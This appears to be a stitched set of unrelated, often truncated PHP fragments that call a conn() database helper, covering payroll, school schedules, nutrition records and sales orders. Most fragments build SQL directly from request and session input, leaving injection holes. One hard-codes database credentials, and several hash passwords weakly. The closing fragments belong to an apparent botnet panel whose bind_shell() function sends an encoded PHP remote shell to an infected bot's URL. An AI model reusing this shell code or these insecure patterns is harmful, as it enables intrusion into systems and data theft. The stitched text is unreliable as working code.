/** * Funcion que obtiene los empleados por puesto * * @return array * @author Walter */ function getEmplePuesto($puesto) { $query = "select e.nombre,e.id from tbl_datos_economicos as d, tbl_empleado as e where d.tbl_empleado_id = e.id\n\t\t\t\tand d.puesto = '{$puesto}'"; $con = conn(); $r = $con->query($query); return $r->fetchAll(); }
function getNumJustificaciones($inicio, $fin, $id) { $con = conn(); $query = " select count(asiento) as num from justificaciones where fecha between '{$inicio}' and '{$fin}' and id_pers = {$id}"; $r = $con->query($query); return $r->fetch(); }
/** * lista las asistencias de un empleado * * @return pdo_array * @author Walter */ function listaAsistenciaEmpleado($inicio, $fin, $id) { $con = conn(); $query = "select a.fecha, a.h_ent, a.h_sal,(time_to_sec(timediff(h_sal,h_ent )) / 3600) as hrs_trabj from personal as p, asistencia as a where p.id = {$id} and p.id = a.id_pers " . "and a.fecha between '{$inicio}' and '{$fin}' and p.activo = TRUE union (select j.fecha, 'JUSTIFICADA','JUSTIFICADA','J' from personal as p,justificaciones as j " . "where p.id = {$id} and p.id= j.id_pers and (j.fecha between '{$inicio}' and '{$fin}') and p.activo = true) order by fecha ASC"; $r = $con->query($query); return $r; }
function get($table, $fields = "*", $other = "") { if (is_array($fields)) { $sql = "SELECT " . merge($fields) . " FROM " . $table . " " . $other; } else { $sql = "SELECT " . $fields . " FROM " . $table . " " . $other; } //echo $sql; return conn()->query($sql)->fetchAll(); }
public function alter_database($query) { if ($this->permission() != ADMIN) { Error('You must be admin to alter the database'); } conn($mysqli); if (!$mysqli->query($query)) { Error($mysqli->error); } $mysqli->close(); }
function refresh_room_sched_datatable() { $conn = conn(); $post = $_POST; $query = 'SELECT tbl_room.`room_no`, tbl_room.`room_name`, tbl_subject.`subject_code`, tbl_subject.`description`, tbl_blocks.`name` AS `block_name`, CONCAT( tbl_faculty.`fname`, " ", tbl_faculty.`mname`, " ", tbl_faculty.`lname` ) AS `prof_name`, tbl_schedule.`monday`, tbl_schedule.`tuesday`, tbl_schedule.`wednesday`, tbl_schedule.`thursday`, tbl_schedule.`friday`, tbl_schedule.`saturday`, tbl_schedule.from, tbl_schedule.`to` FROM `tbl_schedule` INNER JOIN `tbl_room` ON tbl_schedule.`room_id` = tbl_room.`room_id` INNER JOIN `tbl_faculty` ON tbl_schedule.`prof_id` = tbl_faculty.`emp_no` INNER JOIN `tbl_subject` ON tbl_schedule.`subject_id` = tbl_subject.`subject_id` INNER JOIN `tbl_blocks` ON tbl_schedule.`block_id` = tbl_blocks.`id` where tbl_schedule.school_year = ' . $post['school_year'] . ' and tbl_schedule.semester = ' . $post['sem'] . ' and tbl_schedule.prof_id = ' . $_SESSION['faculty_id']; $result = mysql_query($query) or die(mysql_error()); while ($row = mysql_fetch_assoc($result)) { $days = array('monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday'); $sched = ""; foreach ($days as $day) { if ($row[$day] == 1) { $sched .= $day . '<br/>'; } } $sched .= $row['from'] . ' to ' . $row['to']; echo '<tr>'; echo ' <td style="text-align:center">' . $row['room_name'] . ' (' . $row['room_no'] . ')</td>'; echo ' <td style="text-align:center">' . $row['description'] . ' (' . $row['subject_code'] . ')</td>'; echo ' <td style="text-align:center">' . $row['prof_name'] . '</td>'; echo ' <td style="text-align:center">' . $row['block_name'] . '</td>'; echo ' <td style="text-align:center">' . $sched . '</td>'; echo '</tr>'; } }
/** * Funcion que verifica el login de un administrador * * @return boolean * @author Walter */ function checkAdmin($id, $pass) { $con = conn(); $queyr = "SELECT ad.contra FROM administrador as ad where ad.clave = '{$id}'"; $r = $con->query($queyr); $res = $r->fetch(); if ($res['contra'] == $pass && $res != null) { return 1; } else { return 0; } }
function ejecutarInsert($table, $params) { $conexion = conn(); foreach ($params as $field => $value) { $fields .= "{$field},"; $values .= is_string($value) ? "'{$value}'" : "{$value}"; } $insertSQL = "INSERT INTO {$table} ({$fields}) VALUES ({$values});"; $res = pg_query($insertSQL) or sysError("conectaBD.ejecutaConsulta.pg_query '" . $insertSQL . "'"); pg_close($conexion); return $res; }
/** * checa sila clave de un empleado es la correcta * * @return int * @author */ function checkID($emp) { $con = conn(); $query = "select id from personal where id = {$emp} and activo = 1"; $r = $con->query($query); $res = $r->fetch(); if (empty($res)) { return FALSE; } else { return TRUE; } }
function register($username, $password, $mail) { if (!filter_var($mail, FILTER_VALIDATE_EMAIL)) { Error("E-Mail is not valid."); } if (strlen($password) < 8) { Error("Password too short, it have to be bigger than 8 characters."); } if (strlen($username) < 4) { Error("Username too short, it have to be bigger than 4 characters."); } conn($mysqli); $query = "INSERT INTO Users ( Username, Password, Permission, Mail ) VALUES ( '"; $result = $mysqli->query("SELECT * FROM Users LIMIT 1"); if (!$result->fetch_object()) { if (!$mysqli->query($query . $username . "', '" . md5($password) . "', '" . ADMIN . "', '" . $mail . "');")) { Error($mysqli->error); } } else { if (!$mysqli->query($query . $username . "', '" . md5($password) . "', '" . USER . "', '" . $mail . "');")) { Error($mysqli->error); } } }
require_once '../config/config.php'; $msg = ''; $error = FALSE; $app_id = isset($_REQUEST['app_id']) ? clean($_REQUEST['app_id']) : ''; $login_id = isset($_REQUEST['login_id']) ? clean($_REQUEST['login_id']) : ''; $password_id = isset($_REQUEST['password_id']) ? clean($_REQUEST['password_id']) : ''; $db = isset($_REQUEST['db']) ? clean($_REQUEST['db']) : ''; $act = isset($_REQUEST['act']) ? clean($_REQUEST['act']) : ''; if ($_SERVER['REQUEST_METHOD'] == 'POST' and $act == 'login') { try { ex_empty($app_id, 'Pilih APP.'); ex_empty($login_id, 'Masukkan kode user..'); ex_empty($password_id, 'Masukkan Password.'); ex_empty($db, 'Pilih database.'); $conn = conn($db); ex_conn($conn); if ($conn) { $conn->begintrans(); } $user_id = ''; $login_id = strtoupper($login_id); $password_id = $password_id; $full_name = ''; $role = ''; $div = ''; $modul_id = array(); $modul_ha = array(); $obj = $conn->Execute("\n\t\tSELECT \n\t\t\tUPPER(USER_ID) AS USER_ID, \n\t\t\t(PASSOWRD_ID) AS PASSOWRD_ID, \n\t\t\tUPPER(LOGIN_ID) AS LOGIN_ID, \n\t\t\tUPPER(FULL_NAME) AS FULL_NAME,\n\t\t\tUPPER(ROLE) AS ROLE,\n\t\t\tUPPER(DIV) AS DIV\n\t\tFROM\n\t\t\tUSER_APPLICATIONS\n\t\tWHERE\n\t\t\tLOGIN_ID = '{$login_id}'\n\t\t"); $dbpass = $obj->fields['PASSOWRD_ID']; if ($obj->fields['LOGIN_ID'] == $login_id) {
<?php require_once "./mysql_connect.php"; // require_once("./mysql_query.php"); conn(); if ($_POST) { if (isset($_POST['oldbarcode'])) { pupdate($_POST); } else { update($_POST); } } function pupdate($arg) { mysql_select_db('nutrition'); $sql = "delete from nutri0 where barcode='{$arg['oldbarcode']}'"; mysql_query($sql); $sql = "delete from nutri1 where barcode='{$arg['oldbarcode']}'"; mysql_query($sql); $p = array($arg['type'], $arg['description'], $arg['barcode'], $arg['per'], $arg['energykj'], $arg['energykc'], $arg['protein'], $arg['carb'], $arg['sugar'], $arg['fat'], $arg['saturates'], $arg['fibre'], $arg['sodium'], $arg['hydrodised']); insert($p); } function update($arg) { mysql_select_db('nutrition'); $sql = "update nutri0 set"; $i = 0; foreach ($arg as $a => $b) { if (empty($b)) { ++$i; continue;
function updateExecute() { global $config; $myConn = conn('', FALSE); # MUST precede formReq() function, which uses active connection to parse data $redirect = $config->adminEdit; # global var used for following formReq redirection on failure $FirstName = formReq('FirstName'); # formReq calls dbIn() internally, to check form data $LastName = formReq('LastName'); $Email = strtolower(formReq('Email')); $Privilege = formReq('Privilege'); $AdminID = formReq('AdminID'); #check for duplicate email $sql = sprintf("select AdminID from " . PREFIX . "Admin WHERE (Email='%s') and AdminID != %d", $Email, $AdminID); $result = mysql_query($sql, $myConn) or die(trigger_error(mysql_error(), E_USER_ERROR)); if (mysql_num_rows($result) > 0) { # someone already has email! feedback("Email already exists - please choose a different email."); myRedirect($config->adminEdit); # duplicate email } #sprintf() function allows us to filter data by type while inserting DB values. Illegal data is neutralized, ie: numerics become zero $sql = sprintf("UPDATE " . PREFIX . "Admin set FirstName='%s',LastName='%s',Email='%s',Privilege='%s' WHERE AdminID=%d", $FirstName, $LastName, $Email, $Privilege, (int) $AdminID); mysql_query($sql, $myConn) or die(trigger_error(mysql_error(), E_USER_ERROR)); //feedback success or failure of insert if (mysql_affected_rows($myConn) > 0) { $msg = "Admin Updated!"; feedback("Successfully Updated!", "notice"); if ($_SESSION["AdminID"] == $AdminID) { #this is me! update current session info: $_SESSION["Privilege"] = $Privilege; $_SESSION["FirstName"] = $FirstName; } } else { feedback("Data NOT Updated! (or not changed from original values)"); } get_header(); echo ' <div align="center"><h3>Edit Administrator</h3></div> <div align="center"><a href="' . $config->adminEdit . '">Edit More</a></div> <div align="center"><a href="' . $config->adminDashboard . '">Exit To Admin</a></div> '; get_footer(); }
<?php // Create connection function conn() { $con = mysqli_connect("sql200.byethost33.com", "b33_14425459", "66254442", "b33_14425459_shohan"); // Check connection if (!$con) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { $result = mysqli_query($con, "SELECT * FROM person"); if ($result == 0) { echo "error"; } else { echo "<table border='1'>\r\n<tr>\r\n<th>Firstname</th>\r\n<th>Lastname</th>\r\n<th>Salary</th>\r\n<th>email</th>\r\n</tr>"; while ($row = mysqli_fetch_array($result)) { echo "<tr>"; echo "<td>" . $row['first_name'] . "</td>"; echo "<td>" . $row['last_name'] . "</td>"; echo "<td>" . $row['salary'] . "</td>"; echo "<td>" . $row['email'] . "</td>"; echo "</tr>"; } echo "</table>"; } } } return conn();
*/ # SQL statement - PREFIX is optional way to distinguish your app $sql = "select FirstName, LastName, Email from test_Customers"; //END CONFIG AREA ---------------------------------------------------------- get_header(); #defaults to header_inc.php ?> <h3 align="center"><?php echo $config->titleTag; ?> </h3> <p>This page is both a test page for your mysql classic connection, and a starting point for building DB applications using mysql connections</p> <p>creates a simple mysql connection via the function conn()</p> <?php $myConn = conn('', FALSE); # conn() creates mysql classic connection #$result stores data object in memory - $sql & conn are flipped in mysql_ classic connection $result = mysql_query($sql, $myConn) or die(trigger_error(mysql_error($myConn), E_USER_ERROR)); echo '<div align="center"><h4>SQL STATEMENT: <font color="red">' . $sql . '</font></h4></div>'; if (mysql_num_rows($result) > 0) { #there are records - present data while ($row = mysql_fetch_assoc($result)) { # pull data from associative array echo '<p>'; echo 'FirstName: <b>' . $row['FirstName'] . '</b><br />'; echo 'LastName: <b>' . $row['LastName'] . '</b><br />'; echo 'Email: <b>' . $row['Email'] . '</b><br />'; echo '</p>'; } } else {
function countRate() { $id = $_SESSION['userData']['agencyID']; $db = conn(); $sql = "SELECT ( sum(rating)/count(rating)) as rate FROM rating WHERE agencyID = {$id}"; $result = $db->query($sql)->fetch(); return $result; $db = null; }
public function chPassword($password) { conn($mysqli); if (!$this->isUser()) { Error(LOGIN); } if (!$mysqli->query($query . "UPDATE Users SET Password='******' WHERE Username='******'")) { Error($mysqli->error); } $this->password = $password; $mysqli->close(); }
</div> <table class="contentTbl"> <caption> <h2>Usuarios Administradores</h2> </caption> <thead> <tr> <th>#</th> <th>Nombre de Usuario</th> <th>Jornada</th> <th></th> </tr> </thead> <tbody> <?php $connection = conn(); include "../includes/paginator.inc.php"; //echo 'SQL: '.$_pagi_sql.'<br />'; $rows = pg_num_rows($_pagi_result); //echo '$_pagi_totalReg: '.$_pagi_totalReg.'</br>'; //echo '$_pagi_cuantos: '.$_pagi_cuantos.'</br>'; //echo '$rows: '.$rows.'</br>'; if ($rows < 1) { echo '<tr class="rowPaginator"><td colspan="20" align="center">NO SE ENCONTRARON REGISTROS</td></tr>'; } else { $cont = 1; if ($_pagi_totalReg > $_pagi_cuantos) { echo '<tr><td colspan="20" align="center"><strong>' . $_pagi_navegacion . '</strong></td></tr>'; } while ($row = pg_fetch_assoc($_pagi_result)) { if ($cont % 2 == 1) {
function isDupeUser($usr) { $conn = conn(); $table = "fp_users"; $sql = "SELECT COUNT(*) FROM {$table} WHERE username = \"{$usr}\""; $result = mysqli_query($conn, $sql); $row = $result->fetch_row(); if ($row[0] > 0) { echo "USER EXISTS"; } else { echo "VALID"; } $result->free(); $conn->close(); return; }
require '../inc_0700/config_inc.php'; #provides configuration, pathing, error handling, db credentials if (isset($_POST['em']) && isset($_POST['pw'])) { //if POST is set, prepare to process form data //next check for specific issues with data if (!ctype_graph($_POST['pw'])) { //data must be alphanumeric or punctuation only feedback("Illegal characters were entered. (error code #" . createErrorCode(THIS_PAGE, __LINE__) . ")", "error"); myRedirect($config->adminLogin); } if (!onlyEmail($_POST['em'])) { //login must be a legal email address only feedback("Illegal characters were entered. (error code #" . createErrorCode(THIS_PAGE, __LINE__) . ")", "error"); myRedirect($config->adminLogin); } $myConn = conn("", FALSE); # mysql classic conn, MUST precede formReq() which uses active connection to parse data $redirect = $config->adminLogin; # global var used for following formReq redirection on failure $Email = formReq('em'); # formReq()requires a form element with data, redirects to $redirect if no data sent $MyPass = formReq('pw'); # formReq() calls dbIn() internally, to check form data $sql = sprintf("select AdminID,FirstName,Privilege,NumLogins from " . PREFIX . "Admin WHERE Email='%s' AND AdminPW=SHA('%s')", $Email, $MyPass); $result = @mysql_query($sql, $myConn) or die(trigger_error(mysql_error(), E_USER_ERROR)); if (mysql_num_rows($result) > 0) { # valid user, create session vars, redirect! $row = mysql_fetch_array($result); #no while statement, should be single record startSession(); #wrapper for session_start()
function searchByCaption($text) { $res = conn()->query("SELECT * FROM users JOIN posts ON users.id = posts.user_id\n WHERE caption LIKE '%{$text}%' AND is_private=b'0'"); $arr = convertToArray($res); foreach ($arr as $ind => $result) { $arr[$ind]['link'] = 'post/' . $result['id']; $arr[$ind]['header'] = $result['caption']; $arr[$ind]['type'] = 'Post By Caption'; } return $arr; }
function insert($item) { conn(); mysql_select_db("nutrition"); $sql = 'insert into nutri0(type,description,barcode) values('; for ($i = 0; $i < 3; $i++) { $sql .= "'{$item[$i]}'"; if ($i != 2) { $sql .= ','; } else { $sql .= ')'; } } $result = mysql_query($sql); $sql = 'insert into nutri1(barcode,per,energykj,energykc,protein,carb,sugar,fat,saturates,fibre,sodium,hydrodised) values('; for ($i = 2; $i < 14; $i++) { if (empty($item[$i])) { $item[$i] = 'null'; $sql .= 'null'; if ($i != 13) { $sql .= ','; } else { $sql .= ')'; } continue; } if ($i != 13) { if ($i == 3 || $i == 2) { $sql .= "'{$item[$i]}',"; } else { $sql .= "{$item[$i]},"; } } else { $sql .= "'{$item[$i]}')"; } } $result = mysql_query($sql); if (!$result) { die('hehe' . mysql_error() . $sql); } print "successed!"; }
function save_subject_to_course(){ $conn = conn(); $post = $_POST; $delete = 'delete * from tbl_year_course_subjects where course_id = '.$post['course_id'].' and year_level = '.$post['year_level'].' and school_year = '.$post['school_year'].' and semester ='.$post['semester']; mysql_query($delete); foreach($post['subjects'] as $subject_id){ $insert = ' insert into tbl_year_course_subjects ( year_level, course_id, subject_id, school_year, semester ) values( '.$post['year_level'].', '.$post['course_id'].', '.$subject_id.', '.$post['school_year'].', '.$post['semester'].' ) '; $result = mysql_query($insert); } $response['status'] = 'success'; echo json_encode($response); }
$con3 = "SET ANSI_NULLS OFF"; $con3 = mssql_query($con3); $con4 = "SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED"; $con4 = mssql_query($con4); $con5 = "SET LOCK_TIMEOUT -1"; $con5 = mssql_query($con5); $con6 = "SET QUOTED_IDENTIFIER OFF"; $con6 = mssql_query($con6); $con7 = "set language spanish"; $con7 = mssql_query($con7); } if (isset($_POST['pedido'])) { $x = $_POST['pedido']; $movID = $x['pedido_id']; $db = $x['db']; conn($db); $qry = "SELECT v.ID, c.Cliente, c.Nombre, v.FechaEmision, v.FechaRequerida, v.Almacen, v.Proyecto, v.Condicion, v.FormaEnvio, v.ListaPreciosEsp, v.OrdenCompra, v.FechaOrdenCompra, v.Observaciones FROM Venta v JOIN Cte c ON v.Cliente = c.Cliente WHERE v.Mov = 'Pedido' AND v.Estatus = 'Pendiente' AND v.MovID = '" . $movID . "' AND v.Agente ='" . $_SESSION["user"] . "'"; $details = mssql_fetch_array(mssql_query($qry)); $qry = "SELECT * FROM VentaD v JOIN VentaTCalc c ON v.Renglon = c.Renglon AND v.ID = c.ID WHERE v.ID = " . $details["ID"] . " ORDER BY v.Renglon"; $qry = mssql_query($qry); while ($row = mssql_fetch_assoc($qry)) { $sell_details[] = $row; } if ($details) { $html = '<div id="detalles_venta">'; $html .= '<div class="titulos">'; $html .= '<div><strong>Art.</strong></div>'; $html .= '<div><strong>Cant.</strong></div>'; $html .= '<div><strong>Inv.</strong></div>'; $html .= '<div><strong>Desc.</strong></div>'; $html .= '<div><strong>IVA</strong></div>';
<?php quotes(); ?> </div> </div> <div id="menu"> <ul> <li class="txt_left"><?php echo "Local Address: " . $_SERVER['SERVER_ADDR']; ?> </li> <li class="txt_center"></li> <li class="txt_right"><?php echo "Remote Address: " . conn('http://bot.whatismyipaddress.com/'); ?> </li> </ul> </div> <div id="page"> <div id="page-bgtop"> <div id="page-bgbtm"> <div id="content"> <div class="post"> <h2 class="title"><a href="#">Bots</a></h2> <div class="entry"> <p class="meta"> <?php checkbots();
<?php require_once '../../../config/config.php'; $conn = conn(); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <!-- CSS --> <link type="text/css" href="../../../config/css/style.css" rel="stylesheet"> <link type="text/css" href="../../../plugin/css/zebra/default.css" rel="stylesheet"> <link type="text/css" href="../../../plugin/window/themes/default.css" rel="stylesheet"> <link type="text/css" href="../../../plugin/window/themes/mac_os_x.css" rel="stylesheet"> <!-- JS --> <script type="text/javascript" src="../../../plugin/js/jquery-1.10.2.min.js"></script> <script type="text/javascript" src="../../../plugin/js/jquery-migrate-1.2.1.min.js"></script> <script type="text/javascript" src="../../../plugin/js/jquery.inputmask.custom.js"></script> <script type="text/javascript" src="../../../plugin/js/keymaster.js"></script> <script type="text/javascript" src="../../../plugin/js/zebra_datepicker.js"></script> <script type="text/javascript" src="../../../plugin/window/javascripts/prototype.js"></script> <script type="text/javascript" src="../../../plugin/window/javascripts/window.js"></script> <script type="text/javascript" src="../../../config/js/main.js"></script> <script type="text/javascript"> /* lookup function get_lookup(nk) { if (nk.length == 0) { jQuery('#wrap_lookup').fadeOut();
?> </li> <li class="txt_center"><?php echo date("d.m.y"); ?> </li> <li class="txt_right"><?php echo $_SERVER['SERVER_ADDR']; ?> </li> <li class="txt_right"><?php echo $_SERVER['SERVER_NAME']; ?> </li> <li class="txt_right"><?php echo conn('http://bot.whatismyipaddress.com/'); ?> </li> </ul> </div> <div id="page"> <div id="page-bgtop"> <div id="page-bgbtm"> <div id="content"> <div class="post" name="top" > <h2 class="title"><center><a href="#1337day">1337day</a> - <a href="#NVD">Nation Vuln Database</a> - <a href="#securityfocus">Security Focus</a> - <a href="#cxsecurity">cxsecurity</a></center></h2> </div> <div class="post"> <h2 class="title"><a name="1337day" href="#top" >1337day</a></h2> <div class="entry"> <p class="meta">1337day.com</p>
/** * obtiene una lista con los numeros de empleados por lenguajeo curso segun se requiera * * @return void * @author */ function getNumsConoc($tipo) { $query = "select l.lenguaje as label, count(t.curso) as value from tbl_lenguajes as l, tbl_conocimientos as t where t.tbl_lenguajes_id = l.id\n \t\t\t\tand t.curso = {$tipo} group by l.id"; $con = conn(); $r = $con->query($query); return $r->fetchAll(); }
<?php require_once '../../../../../config/config.php'; require_once '../../../../../config/terbilang.php'; die_login(); //die_app(''); //die_mod(''); $conn = conn($sess_db); die_conn($conn); $terbilang = new Terbilang(); $id = isset($_REQUEST['id']) ? base64_decode(clean($_REQUEST['id'])) : ''; $query = "\n\tSELECT * \n\tFROM KWITANSI\n\tWHERE NOMOR_KWITANSI = '{$id}'\n"; $obj = $conn->execute($query); $nama_pembayar = $obj->fields['NAMA_PEMBAYAR']; $keterangan = $obj->fields['KETERANGAN']; $nilai = to_money($obj->fields['NILAI']); $tanggal = tgltgl(f_tgl($obj->fields['TANGGAL'])); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <style type="text/css"> @page { size: A4; margin: 0; } @media screen, print{ body { font-family: verdana,sans-serif;
function bind_shell() { if (isset($_POST['bindpassword']) && isset($_POST['bindport']) && isset($_POST['bindid'])) { $conn = new mysqli(SQL_HOST, SQL_USER, SQL_PWD, SQL_DB); $check = mysqli_query($conn, "SELECT * FROM `bots` WHERE `id` = " . mysql_escape_string($_POST['bindid']) . " LIMIT 1"); $row = mysqli_fetch_array($check); if ($row !== false) { $cmd = 'php+-r+%27%24sockfd+%3D+socket_create%28AF_INET%2C+SOCK_STREAM%2C+SOL_TCP%29%3B+socket_bind%28%24sockfd%2C+%22127.0.0.1%22%2C+%22' . htmlspecialchars($_POST['bindport']) . '%22%29%3B+socket_listen%28%24sockfd%2C15%29%3B+%24client+%3D+socket_accept%28%24sockfd%29%3B+socket_write%28%24client%2C+%22Enter+password%3A+%22%29%3B+%24input%3Dsocket_read%28%24client%2Cstrlen%28%22' . htmlspecialchars($_POST['bindpassword']) . '%22%29%2B2%29%3Bif%28trim%28%24input%29%3D%3D%22' . htmlspecialchars($_POST['bindpassword']) . '%22%29%7Bsocket_write%28%24client%2C%22%5Cn%5Cn%22%29%3Bsocket_write%28%24client%2Cshell_exec%28%22date+%2Ft+%26+time+%2Ft%22%29.%22%5Cn%22.shell_exec%28%22ver%22%29.shell_exec%28%22date%22%29.%22%5Cn%22.shell_exec%28%22uname+-a%22%29%29%3Bsocket_write%28%24client%2C%22%5Cn%5Cn%22%29%3Bwhile%281%29%7B%24commandPrompt%3D%22%5BCMD%5D%3E+%22%3B%24maxCmdLen%3D' . htmlspecialchars($_POST['bindport']) . '%3Bsocket_write%28%24client%2C%24commandPrompt%29%3B%24cmd%3Dsocket_read%28%24client%2C%24maxCmdLen%29%3Bif%28%24cmd%3D%3DFALSE%29%7Becho+%22The+client+Closed+the+conection%21%22%3Bbreak%3B%7Dsocket_write%28%24client%2Cshell_exec%28%24cmd%29%29%3B%7D%7Delse%7Becho+%22Wrong+password%21%22%3Bsocket_write%28%24client%2C%22Wrong+password%21+%5Cn%5Cn%22%29%3B%7D%27'; conn($row[1] . '?_=' . PWN_PHP_METHOD . '&__=' . $cmd); echo '<br /><p>Connection completed</p>'; } else { echo '<br/><p>No shell found for id <b>' . htmlspecialchars($_POST['bindid']) . '</b></p>'; } } }